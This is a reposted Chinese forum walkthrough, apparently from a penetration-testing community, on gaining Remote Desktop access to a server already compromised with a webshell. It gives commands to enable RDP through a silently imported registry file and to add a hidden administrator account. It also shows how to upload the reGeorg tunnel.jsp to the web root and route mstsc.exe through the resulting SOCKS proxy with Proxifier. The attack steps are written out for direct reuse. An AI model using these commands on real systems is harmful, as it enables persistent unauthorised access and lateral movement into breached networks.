一次远程桌面连接【通过】
2020-03-25 18:11:12 Author: forum.90sec.com(查看原文) 阅读量:266 收藏

背景

已上传木马到服务器,可以用冰蝎连接,服务器也开启了3389端口,关闭了防火墙。但是本机还是没法登陆服务器创建的新用户,于是自己google了一番,学习了一点代理知识。

连接条件

查看系统的权限

image

判断3389端口是否开启

netstat -ano

image

如果未开启3389端口

命令行输入

echo Windows Registry Editor Version 5.00>>3389.reg 

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg 

echo "fDenyTSConnections"=dword:00000000>>3389.reg 

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg 

echo "PortNumber"=dword:00000d3d>>3389.reg 

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg 

echo "PortNumber"=dword:00000d3d>>3389.reg 

regedit /s 3389.reg 

del 3389.reg

命令行添加windos用户并升成管理员权限

net user 用户名 密码 /add          添加用户

eg: net user T1me T1me /add

net localgroup administrators UserName /add      将用户加入到本地组

eg: net localgroup administrators T1me /add

配置 reGeorg

什么样的脚本上传什么类型的脚本,reGeorg里面基本所有类型的网站脚本都有

这里是jsp网站,我上传的是tunnel.jsp。

Note:脚本上传的位置,放在服务器能解析的位置

image

判断自己脚本的状态,访问自己的脚本,出现上述字样说明这个脚本可用

image

自己的主机输入如下命令,这段命令将远程代理映射到本地2333端口

python reGeorgSocksProxy.py -l 0.0.0.0 -p 2333 -u 目标网站

eg:python reGeorgSocksProxy.py -l 0.0.0.0 -p 2333 -u http://xxx.xxx.xxx.xxx/uploadFile/driver/2019-09-13/tunnel.jsp
image

出现上述界面就可以用代理软件了

利用proxifier进行socks5代理

首先是设置代理服务器

image

代理服务器设置,这里填2333端口因为我先前代理的端口是2333

image

接下来是设置代理规则

image

代理规则设置如下

image

这里应用程序本来是任意程序,这里只需要添加mstsc.exe(远程桌面连接程序)就行

代理完成后,其他的把对钩去掉就行

image

远程桌面连接

然后就进行远程桌面连接服务器,填写的就是服务器地址,这里我保存过登陆凭据了不用登陆了

image

image

参考链接:

https://blog.csdn.net/limb0/article/details/103863534

https://www.k0rz3n.com/2018/07/06/如何使用reGeorg+Proxifier渗透内网/


文章来源: https://forum.90sec.com/t/topic/910
如有侵权请联系:admin#unsafe.sh